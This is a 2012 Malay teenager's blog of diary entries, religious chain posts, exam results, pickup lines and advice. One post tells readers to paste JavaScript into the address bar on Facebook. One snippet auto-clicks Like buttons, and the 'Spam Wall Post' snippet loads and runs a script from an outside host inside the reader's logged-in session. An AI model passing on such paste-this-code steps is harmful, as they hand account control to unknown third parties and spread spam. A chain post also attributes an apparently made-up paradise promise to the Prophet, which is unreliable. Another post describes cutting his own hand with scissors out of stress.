]


Saturday, 7 April 2012

"Kisah Yang Mungkin Nyata"

gambar contoh

Seperti biasa, setelah pulang dari pejabat dan tiba di rumah, aku terus duduk berehat disofa sambil melepas penat.

Sepertinya aku sangat malas untuk membersihkan diri dan menunaikan solat.

Sementara anak2 & isteri sedang berkumpul diruang tengah.

Dalam keletihan tadi, aku disegarkan dengan adanya angin dingin sepoi2 yang menghembus tepat di muka ku.

Selang beberapa lama seorang yang tak tampak mukanya berjubah putih dengan tongkat ditangannya tiba2 sudah berdiri di depan mata.

Aku sangat terkejut dengan kedatangannya yang tiba2 itu.

Sebelum sempat bertanya.. siapa dia.. tiba2 aku merasa dada ku sesak, sukar untuk bernafas.

Namun aku berusaha untuk tetap menghirup udara seperti biasa.

Yang aku rasakan waktu itu ada sesuatu yang berjalan pelan2 dari dadaku.. terus berjalan.. ke kerongkongku… sakittt… sakit.. rasanya.

Keluar airmataku menahan rasa sakitnya…

Oh Tuhan apa yang telah berlaku pd diriku..

Dalam keadaan yang masih sukar bernafas tadi, benda tadi terus memaksa untuk keluar dari tubuhku… kkhh… khhhh.. kerongkonganku berbunyi.

Sakit rasanya, amat teramat sakit..

Seolah tak mampu aku menahan benda tadi…

Badanku gementar… peluh keringat meluncur deras… mataku terbelalak… air mataku seolah tak berhenti.

Tangan & kakiku kejang2 sedetik setelah benda itu meninggalkan aku.

Aku melihat benda tadi dibawa oleh lelaki misteri itu… pergi… berlalu begitu saja…. hilang dari pandangan.

Namun setelah itu… aku merasa aku jauh lebih ringan, sehat, segar, cerah… tidak seperti biasanya.

Aku heran… isteri & anak2ku yang sedari tadi ada diruang tengah, tiba2 terkejut berhamburan ke arahku..

Di situ aku melihat ada seseorang yang terbujur kaku ada tepat di atas sofa yang kududuki tadi.

Badannya dingin kulitnya membiru.

Siapa dia???

Mengapa anak2 & isteriku memeluknya sambil menangis… mereka menjerit… histeria …. terlebih isteriku
seolah tak mau melepaskan orang yang terbujur tadi…

Siapa dia???

Betapa terkejutnya aku ketika wajahnya dibalikkan.

Dia… dia… dia mirip dengan aku…. ada apa ini Tuhan???

Aku cuba menarik tangan isteriku tapi tak mampu…..

Aku cuba pula untuk merangkul anak2 ku tapi tak berjaya.

Aku cuba jelaskan kalau itu bukan aku.

Aku cuba jelaskan kalau aku ada di sini..

Aku mulai berteriak….. tapi mereka seolah tak mendengarkan aku.

Seolah mereka tak melihatku…

Dan mereka terus-menerus menangis…. aku sedar.. aku sedar bahawa lelaki yang misteri tadi telah membawa rohku.

Aku telah mati… aku telah mati.

Aku telah meninggalkan mereka .. tak kuasa aku menangis… berteriak… Aku tak kuat melihat mereka menangisi mayatku.

Aku sangat sedih.. selama hidupku belum banyak yang kulakukan untuk membahagiakan mereka.

Belum banyak yang telah kulakukan untuk membimbing mereka.

Tapi waktuku telah habis… masaku telah terlewat… aku sudah dikembalikan pada saat aku terduduk di sofa setelah penat seharian bekerja.

Sungguh, bila aku tahu aku akan mati, aku akan membahagi waktu bila harus bekerja, beribadah, untuk keluarga dll.

Aku menyesal aku terlambat menyedarinya.

Aku mati dalam keadaan belum solat.

Oh Tuhan, JIKA Kau inginkan keadaanku masih hidup dan masih bisa membaca bicara hati ini sungguh aku amat sangat bahagia.

Kerana aku MASIH mempunyai waktu untuk bersimpuh, mengakui segala dosa & berbuat kebaikan sehingga bila maut menjemputku kelak aku telah berada pada keadaan yang lebih bersedia.

Sebarkan dakwah ini kepada orang terdekat anda, dan mintalah mereka untuk melakukan hal yang sama.

Ini bukan surat ancaman berantai.

Yang jelas jika anda tidak menyebarkan dakwah ini, maka anda telah mensia2kan kesempatan untuk saling menasihati dalam kebenaran dan beramal salih.

Jika anda lakukan dengan ikhlas insya-Allah anda akan menuai kebaikan.

Mari berlumba dalam kebaikan.

Sesungguhnya Allah Tidak Akan Mengubah Nasib Sesuatu Kaum Itu, Melainkan Mereka Sendiri Yang Mengubah Diri Mereka…


Thanks For Reading. Dont Forget To Follow My Blog!

Sunday, 1 April 2012

Javascript

Well hari ni aku nk update about javascript. Cara-2nya seperti di bawah ni :


1. copy code javascript
2. paste dekat address bar contoh nya:
www.facebook.com ganti dengan javascript tu
3.click enter dan tengok hasilnye

P/s: kalau korang pkai browser google chrome, klau ko paste perkataan "javascript:"dekat depan skali dia akan automatik delete sendiri.so , korang kene tambah sendiri

Javascript : Change Facebook Colour

javascript:i=0;c=["red","green","b...lue","yellow","magenta","orange","pink","violet"]; a=document.links;setInterval('i++;a[i %document.links.length].style.color=c[i % c.length]',1);void(0); alert("-Change Colour- by Khasya")

Javascript : Edit Tulisan Facebook
p/s: website lain pon boleh

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 ; alert("-Edit Tulisan- by Khasya")

Javascript : Gambar "Gila"

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Javascript : Auto Like Status


javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('-Auto Like- by Khasya');updateTime();window.setInterval(updateTime, 1000);void(0)

Javascript : Spam Wall Post


javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)



Thanks For Reading. Dont Forget To Follow My Blog!

Tuesday, 27 March 2012

Kiamat ?


Masih ingat andaian kiamat 2012 ?
Tahun ni kan??
JANGAN percaya lagi !!!!!
Sebab
Kiamat menurut Agama Islam
=========================
- Kemunculan Imam Mahdi
- Kemunculan Dajjal
- Keturunan Hazrat Isa (AS)
- Kemunculan Yakjuj Dan Makjuj
- Terbitnya matahari dari Barat ke Timur
- Pintu pengampunan akan ditutup
- Dab'bat al-Ard akan keluar dari tanah & akan menandai muslim yang sebenar2nya
- Kabus selama 40 Hari akan mematikan semua orang beriman sejati shj mereka tidak perlu mengalami tanda2 kiamat lainnya
- Sebuah kebakaran besar akan menyebabkan kerusakan,
- Pemusnahan Kabah,
- Tulisan dalam Al-Quran akan lenyap,
- Sangkakala akan ditiup pertama kalinya binatang2 & org2 kafir yang tersisa akan mati, semua gunung & bangunan akan runtuh
- Tiupan sangkakala yang kedua kalinya akan membangkitkan semua ciptaan Allah & bertemu di dataran Arafah menuju saat penghakiman mereka.. Dan Matahari akan mendekatkan dirinya ke bumi
=========================
Nabi MUHAMMAD SAW telah bersabda:
"Barang siapa yg mengingatkan ini kepada orang lain, akan Ku buatkan tempat di Syurga baginya pada hari penghakiman kelak."

Kita selalu kirim ribuan bende kat fb, tapi bila kirim yang berkaitan dengan ibadah mesti berfikir-fikir.

Allah berfirman : "Jika engkau lebih mengejar duniawi daripada mengejar dekat denganKu maka Aku berikan, tapi Aku akan menjauhkan kalian dari SyurgaKu"


Thanks For Reading. Dont Forget To Follow My Blog!

Monday, 26 March 2012

Lost In Translation Jawi To Rumi

actually, pada entri kali ni aku copy paste pada 1 blogg yg aku dok blogwalking tadi. agak best tajuk kali ini. Jom Layan !


Sebenarnya dulu lagi, aku pernah terpikir kenapa “melepaskan batuk di tangga” tu bermaksud buat kerja separuh jalan?


Cikgu-cikgu Bahasa Melayu aku pun takde explain lebih lanjut pasal apa batuk tu. Jadi aku assume maksudnya kita batuk dekat tangga. Tapi memang tak boleh relate, kenapa batuk dekat tangga tu maksudnya buat kerja tak habis? Kenapa batuk? Bukan bersin di tangga ke, sendawa ke, menguap ke? Sebenarnya bukan batuk , tapi BATOK .


Apa batok tu? Batok tu sebenarnya sejenis perkakas yang diperbuat daripada tempurung kelapa. Adat orang Melayu, sebelum naik ke atas rumah, kita akan basuh kaki dulu dekat tempayan. Batok digunakan untuk menceduk air dari tempayan. “Melepaskan batok di tangga” bermaksud kita tak letakkan balik batok dekat tempat asal, iaitu kita tinggalkan macam tu je dekat tangga lepas guna. Macam lepas guna getah paip dalam tandas, tak letak hujung dia dekat pemegang lah lebih kurang. Daripada situlah ia bermaksud buat kerja separuh jalan.


Inilah contoh batok tu ye kawan-kawan:

clip_image006

“Kau ada batok dekat rumah? Kau mampu?”


Untuk burung pegar pulak, aku cuba google gambar dia. Kemudian jumpa dekat wikipedia :

clip_image008

Namaku Si Pegar, bukan Pagar!


Ha, nilah contoh burung pegar, atau dalam Englishnya berbunyi ‘pheasant’.

Dekat Malaysia rupanya kita panggil ayam pegar, dekat Indonesia pulak dipanggil burung pegar. Tapi ayam ke, burung ke; kedua-duanya bertepatanlah dengan peribahasa ‘harapkan pegar, pegar makan padi’. OK, patutlah. Selama ni ingatkan pagar. Sebab tulah rasa pelik, kenapa pagar makan padi? Lagipun zaman dulu mana ada orang pagar sawah padi (ada ke? Rasa macam takde...).

Rupanya orang maksudkan pegar. Pegar ni digunakan macam burung hantu lah agaknya. Kawalan biologi untuk membunuh tikus dan serangga perosak dekat sawah padi. Tetapi ketika mengharap burung pegar ini tolong makan tikus dan serangga di sawah, burung pegar ni makan pulak padi. Dia mengkhianati kepercayaan tuan punya sawah untuk menjaga sawahnya daripada dimakan binatang perosak; dia sendiri jadi binatang perosak. Jadilah pepatah ‘harapkan pegar, pegar makan padi’.


Kepada yang membaca, marilah kita mula membetulkan persepsi orang tentang kesilapan-kesilapan terjemahan tulisan Jawi ke rumi. Disebabkan satu huruf je, maksudnya lari terus. Ramai orang yang tak tahu sebelum ni, (mungkin) termasuk cikgu-cikgu Bahasa Melayu.

So kita dah tahu ni, jom sama-sama sebarkan! Jangan biarkan kesilapan ni menghantui anak cucu kita! (ini adalah SERIUS!)





Thanks For Reading. Dont Forget To Follow My Blog!

Saturday, 24 March 2012

Sedarlah...

sebenarnya dalam entri ni lebih berkait rapat dengan wanita di akhir zaman nihh [walaupon aku laki] . bak kate orang putih, SHARING IS CARING , hohoho . bukan apa, sebenarnya ia about "HIJAB" . korang taau apa itu HIJAB ? tapi aku percaya kebanyakan perempuan akan salah tafsir seperti gambar di bawah ni. bacelah dengan hati yg terbuka kay. ;)


Thanks For Reading. Dont Forget To Follow My Blog!

JUAL JUAL!

Jualan panas ! Ade sesape nk beli?? HOHO . jap-2, jual ape nihh?? Wahahaha.. Actually camni cite dia, tadi aku saje dok blogwalking at blog kawan-2 aku. and aku jumpa .... jumpa apa ? jumpa apa? Ahahaha, aku jumpe one application about BLOG PRICE . nak try harge blog korang??? ikut step ni. Click HERE for website. then put ur cute link's blog there. after that click Value button there.

nak tauu harge blog akuu?? ape?! taknak?! Alorr.. cakap laa nakk :((( Ahahaha. walaupon korang taknak tau, aku bagitau ehh?? ehehehe. Soo.. my blog price is... JengJengJengg




HOHOHO. boleh la dikatakan mahall?? hah! ade sesape nk beli takk?? bak mehh duet duluu !! HOHOHO. actually aku pon terkejut mule-2 sbb yelaa.. blog aku ni da la baru. post tk bnyk and edit stakat pangkat newbie jee.. hohoho. klau la dapat jual blog ni betul-2 kan best. wakakaka xD

k sampai sini je laa aku makan kerepek. sbb aku tanak banyak sangat merepek. hoho. hah? ape lagi? pegi la check harge blog korang plakk ! ^_^V


Thanks For Reading. Dont Forget To Follow My Blog!

Thursday, 22 March 2012

Polis Ohh Polis

tdi mase balik sekolah basikal wat hal, rantai asyik jatuh je. aku stop depan abang-2 polis yg tengah dok melepak kt depan sekolah tuh nk betulkan rantai . tetibe sorang polis ckp , "Adik, kalau nak bagi rantai tu betul-2 lekat, balik nanti beli gam gajah lekat." pastu semue polis kat situ gelakk . dalam hati aku nak je aku ckp kat polis tuh camny "Kau buat lawak ke siaall? Ohh, lupe plak aku nak gelakk." then da betulkan rantai, aku pegi depan sikit pastu jerit kuat-2 "CIBAI !" . HAHAHA . polis tak polis laa kan :P


Thanks For Reading. Dont Forget To Follow My Blog!

Wednesday, 21 March 2012

"GOOD" News .

The "GOOD" News is... i dont get any C for my exam harituh. HOHO . GoodNews la sangatkan?? but aku nk straight A's not dont have any C's :( So , my OVERALL mark is :

  • Geo : 94 [A]
  • BM : 84 [A]
  • MT : 76 [B]
  • Sej : 74 [B]
  • AG : 70 [B]
  • KhB : 75 [B]
  • Sc : 64 [B]
  • Bi : 60 [B]
So, my OVERALL grade is 2A [only] and 6B . Sedihh gilarkk ! T^T tak seperti yg aku harapkan. tapi Alhamdulillah , there's no C in my result. HOHO. malu malu. xD K , tu je la yg aku nk bgitauu. HEHE .
Assalam~


Thanks For Reading. Dont Forget To Follow My Blog!

Tuesday, 20 March 2012

Regreting EVERYTHING



ade sesape tertanye-tanye gambar apekah itu? Ahahaha . actually, tu gambar tangan aku yg aku coret-coret dengan gunting. maybe tak jelas sangat because of flash. hoho . kenape aku coret tangan aku? actually aku tengah stress sebab aku dapat B for MT and C for BI . but luckily cikgu aku ade salah tande, so , ade la tambah sikit markah. sedikit sebanyak dapat la jugak naik kepada B walaupon cukup-cukup makan. HOHO . so my marks for now is :
  • Geo = 94 [A]
  • BM = 84 [A]
  • Sej = 74 [B]
  • Sc = 64 [B]
  • BI = 60 [B]
  • Mt = 76 [B]
So my grade FOR NOW is 2A 4B. Sedih gile. T_T tapi ape yg paling sedih ialah aku menyesal sbb coret tangan aku sampai jadi gitu, HOHO . my marks would'nt never change with that ;) hope my results after this akan bertambah baik. doakan aku ye ;) hehehe . So sampai sini je lah aku makan kerepek and stop merepek.
Assalam .


Thanks For Reading. Dont Forget To Follow My Blog!

Monday, 5 March 2012

Hari Yang Penuh Dugaan !

gambar hiasan


Haa ! tengok tajukk tuh.. agak-2 ape aku nk cite erk dlm entri nih? ofcourse laa dugaan aku di harii yg muliaa nihh !! klau tanak bacee , lu orang bole blaa !! ganas bahase banggg ! xDD


Haha ! Actually hari nii memang penatt + sakit + maluu gilarkk ! Kenape?! sbb arini kaki and jari lukaa sakit! and baju seragam skolah yg putih tuhh koyak ! Camne bole koyak? actually tadi kt surau waktu solat Asar . aku kne kacau and lepas solatt aku kejar sorang daripade budak tuhh nama dia secret ;)) thenn tetibe aku terlanggar pintu then baju aku kne paku trus koyak .


Kenape jari ngn kaki aku boleh luke??? Actually mase awal-2 petang aku dtg skolahh , aku saje cari pasal dgn budak yg same aku buat ape?? duit dye terkeluar skit dari poket, aku amik then genggam kuat-2 . then dia dtg terus cakar tangan akuu . memang salah aku laa tuhh. HAHAHA ! Camne kaki aku plak bole luke?? aku gaduh dgn budak yg samee -.-" at surau . tetibe aku terpijak sesuatu . mule-2 aku tk rase pape . then tetibe time nk pkai kasut aq tgok berdarah . aiseyy ..


Kenape nk malu ?? sbb mase solat tuh waktu Science, then lepas tuh ade Perhimpunan maklumlaa , hari Isnin kann aku terpakse la cover baju aku yg koyakk tuhh dgn care yg tersendiri . mcm mane aku cover?? tu tk pyh tauu laa . Haha :D

Lepas abis perhimpunan jee terus bukak baju tuh and campak dalam beg . then cepat-2 amik basikal trus rushing homee ! bukan balik trus actually, smpt plak aku singgah kt kedaii mamak beli something mcm biase laa xDD

cume ape yg lainnye aku pegi sorang kali ni, selalu ngn kwn . huhu ! So arini mmg balik awal ar .

K la ! Post aku da mcm karangan da nihh ! HAHA . da penat tgn aku tuliss niii ! kbyee!


Thanks For Reading. Dont Forget To Follow My Blog!

Wednesday, 8 February 2012

Tips Mengorat Awek Cun


walaupun tips-2 ini agak tinggi risikonya untuk korang kene penyepak @ dikatakan gila, tapi aku rase klau kita betul-2 ikhlas , ape salahnye approach camni .
Korang Cuba:
  1. Excuse me, I baru lagi kt sini, boleh bagi direction camne nk pergi rumah U?
  2. U tau tak? Mata U same dgn color porcshe I.
  3. Senang cite camni lah, U amik telefon I ni, nanti I call U.
  4. boleh tak saya nk amik gambar saudari? nak tunjuk kt kengkawan yg bidadari syurga betul-2 dah menjelma.
  5. mintak maaf cik. boleh saya pinjam telefon cik kejap? emergency ni! mak saya pesan, kalau saya dah jatuh cinta, telefon dia cepat.
  6. Nombor I hilang lah, boleh I mintak nombor U?
  7. helo, saya pencuri & saya kat sini nak curi hati awk.
  8. sakit tak bila jatuh dari syurga?
  9. klau lah U ni burger baru kat McD, I akan panggil U , mcgorgeous!
  10. I tak tau camne nk ckp, tapi I rase U dah curi hati I.
  11. I perasan yg U perasan yg I perhatikan U. U perasan tak?
  12. awak tak penat ker? sebab sepanjang hari awk berlegar-legar dalam kepala saya.
  13. hah, skrang saya dah ada depan awk. ape lagi 2 permintaan awk?
  14. hai! saya cuma nk cakap I rase U awek paling cantek pernah saya nampak. jadi saya belikan air ini untuk awak.
  15. hai! suare dalam kepale saye asyik hasut I suruh I dekat & bercakap dengan U.
  16. hai! I cuma ada 3 bulan je lagi untuk hidup.


Thanks For Reading. Dont Forget To Follow My Blog!

Sunday, 5 February 2012

Adab-Adab Menuntut Ilmu By Ustaz Azhar Idrus

1. IKHLAS NIAT

2. TEKUN BERUSAHA DAN TAWAKKAL

3. MENJAUHI MAKSIAT

4. MEMILIH TEMAN YANG SOLEH.

5. BANYAKKAN ZIKRULLAH

6. MENJAGA KEHORMATAN

7. DOA DAN KEREDHAAN IBUBAPA

8. MENGHORMATI GURU

9. BERAMAL DENGAN SEGALA ILMU YANG DIPEROLEHI


Thanks For Reading. Dont Forget To Follow My Blog!

Saturday, 28 January 2012

HidupKu

Kenape aku rase semakin lame da semakin rmai org yg tanak lyn aku? maybe perasangka or maybe betul . Ermm , aku tau la aku tk hensem , aku hodoh, tpi tk kn sbb tu pn xde org nk lyn aq , da takdir org mcm aq ni x d'lyn , nk buat camne kn,. Ermm . aku pkir nk deactivate account fb [Poi Sony] memandang kn smakin lame smakin aq kehilangan kwn and hati terluke , baik deactivate account fb tuh . lagi pon , esk skola da start , ta bole la nk online je .


k la , sampai situ je . Assalam .


Thanks For Reading. Dont Forget To Follow My Blog!

HOMEWORKS !

lagi sehari dan beberape jam sekola akan start , and ade lagi 3 homeworks yg aku tk siap and malas nk buat [banyak and susah] iaitu PAI [Agama] , Sejara and English ! Huh, aku pon tk tau kenape aku malas nk buat homeworks-2 nihh , adoii , kalau tk siap tk pasal-2 kene marah dgn cikgu , buat malu je , dah la aki kelas first![kowt] Memang la weyy ! lagi pon kelas 1st ni susah uhh , budak-2 smue pandai-2 and rajin-2 except aku[maybe] :( . ade sesape sudi nk tolong buat kan homeworks aku?? HEHE xD

[Peace, No War]


Thanks For Reading. Dont Forget To Follow My Blog!

10 Tanda Jodoh Kita

Firman Allah SWT, bermaksud "Jika kamu menolong (agama) Allah, nescaya Dia akan menolongmu dan meneguhkan kedudukanmu" (Surah Muhammad, ayat 7)

Jodoh adalah perkara yang sudah ditetapkan oleh Allah yang maha Esa. Tetapi bagaimana kita mengetahui dia memang ditakdirkan untuk kita? Allah SWT mengurniakan manusia telinga untuk mendengar, mata untuk melihat dan aka untuk berfikir. Jadi gunakan sebaik-baiknya bagi mengungkapkan rahsia cinta yang ditakdirkan. Dua manusia yang rasa mereka dapat hidup bersama dan memang dijodohkan pasti memiliki ikatan emosi , spiritual dan fizikal antara keduanya. Apabila bersama, masing-masing dapat merasai kemanisan cinta dan saling memerlukan antara satu sama lain. Lalu gerak hati mengatakan, dialah insan yang ditakdirkan untuk bersama. Benarkah ia seperti yang diperkatakan?

Berikut adalah 10 petanda yang menunjukkan dia adalah jodoh kita :

1. Bersahaja

Kekasih kita itu bersikap bersahaja dan tidak berlakon. Cuba perhatikan cara dia berpakaian, cara percakapan, cara ketawa serta cara makan dan minum. Adakah ia spontan dan tidak dikawal ataupun kelihatan pelik. Kalau ia nampak kurang selesa dengan gayanya, sah dia sedang berlakon. Kadang-kadang, kita dapat mengesan yang dia sedang berlakon. Tetapi, apabila dia tampil bersahaja dan tidak dibuat-buat, maka dia adalah calon hidup kita yang sesuai. Jika tidak, dia mungkin bukan jodoh kita.

2. Senang Bersama

Walaupun kita selalu bersamanya, tidak ada sedikit pun perasaan bosan, jemu ataupun tertekan pada diri kita. Semakin hari semakin sayang kepadanya. Kita sentiasa tenang, gembira dan dia menjadi pengubat kedukaan kita. Dia juga merasainya. Rasa senang sekali apabila bersama. Apabila berjauhan, terasa sedikit tekanan dan rasa ingin berjumpa dengannya. Tidak kira siang ataupun malam, ketiadaannya terasa sedikit kehilangan.

3. Terima Kita Seadanya

Apapun kisah silam yang pernah kita lakukan, dia tidak ambil peduli. Mungkin dia tahu perpisahan dengan bekas kekasihnya sebelum ini kita yang mulakan. Dia juga tidak mengambil kisah siapa kita sebelum ini. Yang penting, siapa kita sekarang. Biarpun dia tahu yang kita pernah mempunyai kekasih sebelumnya, dia tidak ambil hati langsung. Yang dia tahu, kita adalah miliknya kini. Dia juga sedia berkongsi kisah silamnya. Tidak perlu menyimpan rahsia apabila dia sudah bersedia menjadi pasangan hidup kita.

4. Sentiasa Jujur

Dia tidak kisah apa yang kita lakukan asalkan tidak menyalahi hukum hakam agama. Sikap jujur yang dipamerkan menarik hati kita. Kejujuran bukan perkara yang boleh dilakonkan. Kita dapat mengesyaki sesuatu apabila dia menipu kita. Selagi kejujuran bertakhta di hatinya, kebahagiaan menjadi milik kita. Apabila berjauhan, kejujuran menjadi faktor paling penting bagi suatu hubungan. Apabila dia tidak jujur, sukar baginya mengelak daripada berlaku curang kepada kita. Apabila dia jujur, semakin hangat lagi hubungan cinta kita. Kejujuran yang disulami dengan kesetiaan membuahkan percintaan yang sejati. Jadi, dialah sebaik-baik pilihan.

5. Percaya Mempercayai

Setiap orang mempunyai rahsia tersendiri. Adakalanya rahsia ini perlu dikongsi supaya dapat mengurangkan beban yang ditanggung. Apabila kita mempunyai rahsia dan ingin memberitahu kekasih, adakah rahsia kita selamat di tangannya? Bagi mereka yang berjodoh, sifat saling percaya mempercayai antara satu sama lain timbul dari dalam hati nurani mereka. Mereka rasa selamat apabila memberitahu rahsia-rahsia kepada kekasihnya berbanding rakan-rakan yang lain. Satu lagi, kita tidak berahsia apa pun kepadanya dan kita pasti rahsia kita selamat. Bukti cinta sejati adalah melalui kepercayaan dan kejujuran. Bahagialah individu yang memperoleh kedua-duanya.

6. Senang Bekerjasama

Bagi kita yang inginkan hubungan cinta berjaya dan kekal dalam jangka masa yang panjang, kita dan dia perlu saling bekerjasama melalui hidup ini. Kita dan kekasih perlu memberi kerjasama melakukan suatu perkara sama ada perkara remeh ataupun sukar. Segala kerja yang dilakukan perlulah ikhlas bagi membantu pasangan dan meringankan tugas masing-masing. Perkara paling penting, kita dan dia dapat melalui semua ini dengan melakukannya bersama-sama. Kita dan dia juga dapat melakukan semuanya tanpa memerlukan orang lain dan kita senang melakukannya bersama. Ini penting kerana ia mempengaruhi kehidupan kita pada masa hadapan. Jika tiada kerjasama, sukar bagi kita hidup bersamanya. Ini kerana, kita yang memikul beban tanggungjawab seratus peratus. Bukankah ini menyusahkan?

7. Memahami Diri Kita

Bagi pasangan yang berjodoh, dia mestilah memahami diri pasangannya. Semasa kita sakit dia bawa ke klinik. Semasa kita berduka, dia menjadi penghibur. Apabila kita mengalami kesusahan, dia menjadi pembantu. Di kala kita sedang berleter, dia menjadi pendengar. Dia selalu bersama kita dalam sebarang situasi. Tidak kira kita sedang gembira ataupun berduka, dia sentiasa ada untuk kita. Dia juga bersedia mengalami pasang surut dalam percintaan. Kata orang, "lidah sendiri lagikan tergigit", inikan pula suami isteri'. Pepatah ini juga sesuai bagi pasangan kekasih. Apabila dia sentiasa bersama kita melalui hidup ini di kala suka dan duka, di saat senang dan susah, dialah calon yang sesuai menjadi pasangan hidup kita.

8. Tampilkan Kelemahan

Tiada siapa yang sempurna di dunia ini. Tipulah jika ada orang yang mengaku dia insan yang sempurna daripada segala sudut. Pasti di kalangan kita memiliki kelemahan dan keburukan tertentu. Bagi dia yang bersedia menjadi teman hidup kita, dia tidak terlalu menyimpan rahsia kelemahannya dan bersedia memberitahu kita. Sudah tentu bukan senang untuk memberitahu dan mengakui kelemahan di hadapan kekasihnya. Malah, dia tidak segan mempamerkan keburukannya kepada kita. Misalnya, apabila dia bangun tidur ataupun sakit dan tidak mandi dua hari, dia tidak menghalang kita daripada melawatnya.Apabila kita dan dia saling menerima kelemahan dan sifat buruk masing-masing, memang ditakdirkan kita hidup bersamanya.

9. Kata Hati

Dengarlah kata hati. Kadangkala, manusia dikurniakan Allah deria keenam yang dapat mengetahui dan memahami perasaan pasangannya. Dengan deria batin ini juga kita dapat saling tahu perasaan masing-masing. Kita dan dia juga dapat membaca fikiran antara satu sama lain dan dapat menduga reaksi dan tindakbalas pada situasi tertentu. Apabila kita yakin dengan pilihan hidup kita, tanyalah sekali lagi. Adakah dia ditakdirkan untuk kita? Dengarlah kata hati dan buatlah pilihan. Serahlah segalanya pada ketentuan yang maha berkuasa.

10. Solat Istikharah dan Tawakkal

Jodoh dan pertemuan semuanya di tangan Allah SWT. Manusia hanya perancang di pentas dunia ini dan skripnya ditulis oleh yang maha esa. Adakalanya, dalam memainkan peranan sebagai pelakon, diberi petunjuk melalui mimpi atau gerak hati. Mimpi memang mainan tidur, tetapi apabila kita melakukan sembahyang Istikharah dan memohon supaya Allah memberikan petunjuk, insya-Allah dengan izinnya kita mendapat petunjukNya. Jika dia pilihan kita, buatlah keputusan sebaiknya. Jika tidak, tolaklah dia dengan baik. Semua yang kita lakukan ini adalah bagi mendapatkan kebahagiaan hidup di dunia. Setelah semuanya diusahakan, berserahlah kepadaNya dan terus berdoa. Ingatlah, nikmat di dunia ini hanya sementara.Nikmat di akhirat adalah kekal selamanya.


Thanks For Reading. Dont Forget To Follow My Blog!

Monday, 23 January 2012

KAWAN :)

Jika semalam aku menyampah dengan kau,
Hari ini aku suka kau,
Jika semalam aku mengumpat kau,
Hari ini aku menutup mulut untuk mengumpat kau,
Jika semalam aku menganggap kau hodoh,
Hari ini kau nampak kau cantik sekali,
Jika semalam aku rasa kau gedik dan kepoh,
Hari ini aku menganggap kau bukan seorang yg hipokrit,
Jika semalam aku anggap kau pemalas,
Hari ini aku faham mengapa kau menjadi pemalas,
Jika semalam aku join orang yg mengumpat kau,
Hari ini aku tutup telinga daripada dengar orang mengumpat kau,
Jika semalam aku membenci kau,
Maka hari ini aku sayang dekat kau,
Ya, hari ini aku sayang dekat kau, maafkan aku selama jika aku hipokrit dekat kau.
YA ALLAH ampuni hambamu ini, yang seolah-olah memakan daging saudara sendiri.


Thanks For Reading. Dont Forget To Follow My Blog!

Happy Chinese New Year !

aq just nk ucapkan HAPPY CHINESE NEW YEAR! kepade chinese-2 yg menyambut perayaan ini .
1 bende je aq x ske bile chinese new year ni , korang tau ape???
yeaa , that's right , MERCUN TENGAH MALAM!
nak je aq jerit kt chinese-2 yg maen mercun tgh mlm tu camni
"WOI ORANG NAK TIDO LA $!@[L] !!!"
Ahaha , JK

Ok , That's all

[Jangan Lupe Follow Ye Stalker] ;)


Thanks For Reading. Dont Forget To Follow My Blog!

Sunday, 22 January 2012

New In Here .

Hello , im new blogger here , tegur la kalau ade pape yg salah atau silap kay , and jangan lupe follow ;)


Thanks For Reading. Dont Forget To Follow My Blog!